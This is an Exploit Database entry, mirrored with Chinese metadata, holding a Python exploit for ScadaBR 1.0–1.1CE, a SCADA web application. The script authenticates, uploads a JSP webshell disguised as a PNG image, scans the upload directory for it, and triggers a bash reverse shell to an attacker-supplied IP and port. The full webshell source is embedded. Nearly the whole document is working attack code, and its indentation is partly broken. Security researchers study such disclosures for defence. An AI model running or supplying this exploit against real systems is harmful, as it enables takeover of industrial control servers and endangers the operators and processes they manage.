ScadaBR 1.0 – Arbitrary File Upload (Authenticated) (2)

• Exploit Database
• 37 阅读

• 作者： Fellipe Oliveira
  日期： 2021-04-01
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/49735/

• # Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)
  # Date: 04/21
  # Exploit Author: Fellipe Oliveira
  # Vendor Homepage: https://www.scadabr.com.br/ 
  # Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux
  # Tested on: Debian9,10~Ubuntu16.04
  
  #!/usr/bin/python
  
  import requests,sys,time
  
  
  if len(sys.argv) <=6:
  print('[x] Missing arguments ... ')
  print('[>] Usage: python LinScada_RCE.py <TargetIp> <TargetPort> <User> <Password> <Reverse_IP> <Reverse_Port>')
  print('[>] Example: python LinScada_RCE.py 192.168.1.24 8080 admin admin 192.168.1.50 4444')
  sys.exit(0)
  else: 
  time.sleep(1)
  
  host = sys.argv[1]
  port = sys.argv[2]
  user = sys.argv[3]
  passw = sys.argv[4]
  rev_host = sys.argv[5]
  rev_port = sys.argv[6]
  
  flag = False
  LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm'
  PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm'
  
  
  banner = '''
  +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
  |_________.___ ____________________ |
  | / _____/ ____ _____ __| _/____ \______ \______ \|
  | \_____\_/ ___\\__\ / __ |\__\ ||_/| _/ |
  | /\\___ / __ \_/ /_/ | / __ \|| \|| \|
  |/_______/\___>____/\____ |(____/______/|____|_/|
  |\/ \/ \/\/ \/ \/\/ |
  | |
  |> ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload |
  |> Exploit Author : Fellipe Oliveira|
  |> Exploit for Linux Systems|
  +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
  '''
  
  def main():
  payload = {
  'username': user,
  'password': passw
  }
  
  print(banner)
  time.sleep(2)
   
  with requests.session() as s:
  s.post(LOGIN, data=payload)
  	response = s.get(PROTECTED_PAGE)
  
  print "[+] Trying to authenticate "+LOGIN+"..."
  	if response.status_code == 200:
  	print "[+] Successfully authenticated! :D~\n"
  	time.sleep(2)
  	else:
  	print "[x] Authentication failed :("
  sys.exit(0)
  
  
  burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm"
  	burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"}
  	burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------32124376735876620811763441977", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"}
  	burp0_data = "-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_369755\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"webshell.jsp\"\r\nContent-Type: image/png\r\n\r\n <%@page import=\"java.lang.*\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.io.*\"%>\n<%@page import=\"java.net.*\"%>\n\n<%\nclass StreamConnector extends Thread {\nInputStream is;\nOutputStream os;\nStreamConnector(InputStream is, OutputStream os) {\nthis.is = is;\nthis.os = os;\n}\npublic void run() {\nBufferedReader isr = null;\nBufferedWriter osw = null;\ntry {\nisr = new BufferedReader(new InputStreamReader(is));\nosw = new BufferedWriter(new OutputStreamWriter(os));\nchar buffer[] = new char[8192];\nint lenRead;\nwhile ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {\nosw.write(buffer, 0, lenRead);\nosw.flush();\n}\n} catch (Exception e) {\nSystem.out.println(\"exception: \" + e.getMessage());\n}\ntry {\nif (isr != null)\nisr.close();\nif (osw != null)\nosw.close();\n} catch (Exception e) {\nSystem.out.println(\"exception: \" + e.getMessage());\n}\n}\n}\n%>\n\n<h1>Payload JSP to Reverse Shell</h1>\n<p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process</p>\n<form method=\"get\">\n\tIP Address<input type=\"text\" name=\"ipaddress\" size=30 value=\"127.0.0.1\"/>\n\tPort<input type=\"text\" name=\"port\" size=10 value=\"1234\"/>\n\t<input type=\"submit\" name=\"Connect\" value=\"Connect\"/>\n</form>\n\n<%\nString ipAddress = request.getParameter(\"ipaddress\");\nString ipPort = request.getParameter(\"port\");\nSocket sock = null;\nProcess proc = null;\nif (ipAddress != null && ipPort != null) {\ntry {\nsock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\nSystem.out.println(\"socket created: \" + sock.toString());\nRuntime rt = Runtime.getRuntime();\nproc = rt.exec(\"/bin/bash\");\nSystem.out.println(\"process /bin/bash started: \" + proc.toString());\nStreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());\nSystem.out.println(\"outputConnector created: \" + outputConnector.toString());\nStreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());\nSystem.out.println(\"inputConnector created: \" + inputConnector.toString());\noutputConnector.start();\ninputConnector.start();\n} catch (Exception e) {\nSystem.out.println(\"exception: \" + e.getMessage());\n}\n}\nif (sock != null && proc != null) {\nout.println(\"<div class='separator'></div>\");\nout.println(\"<p>Process /bin/bash, running as (\" + proc.toString() + \", is connected to socket \" + sock.toString() + \".</p>\");\n}\n%>\n\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------32124376735876620811763441977--\r\n"
  	getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
  
  
  	print('[>] Attempting to upload .jsp Webshell...')
  	time.sleep(1)
  print('[>] Verifying shell upload...\n')
  	time.sleep(2)
  	
  	if getdata.status_code == 200:
  	print('[+] Upload Successfuly! \n')
  	
  	for num in range(1,1000):	
  		PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)
  find = s.get(PATH)
  
  if find.status_code == 200:	
  print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num))
  print('[>] Spawning Reverse Shell...\n')
  time.sleep(3)
  			
  		burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?ipaddress=%s&port=%s&Connect=Connect" % (num,rev_host,rev_port)
  		burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"}
  		burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
  		r = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
  		time.sleep(5)
  		
  		if len(r.text) > 401:
  		print('[+] Connection received')
  		sys.exit(0)
  	 	else:
  print('[x] Failed to receive reverse connection ...\n')			
  
  		elif num == 999:
  print('[x] Failed to found Webshell ... ')
  
  	else:
  	print('Reason:'+getdata.reason+' ')	 
  	print('Exploit Failed x_x')
  
  
  if __name__ == '__main__':
  main()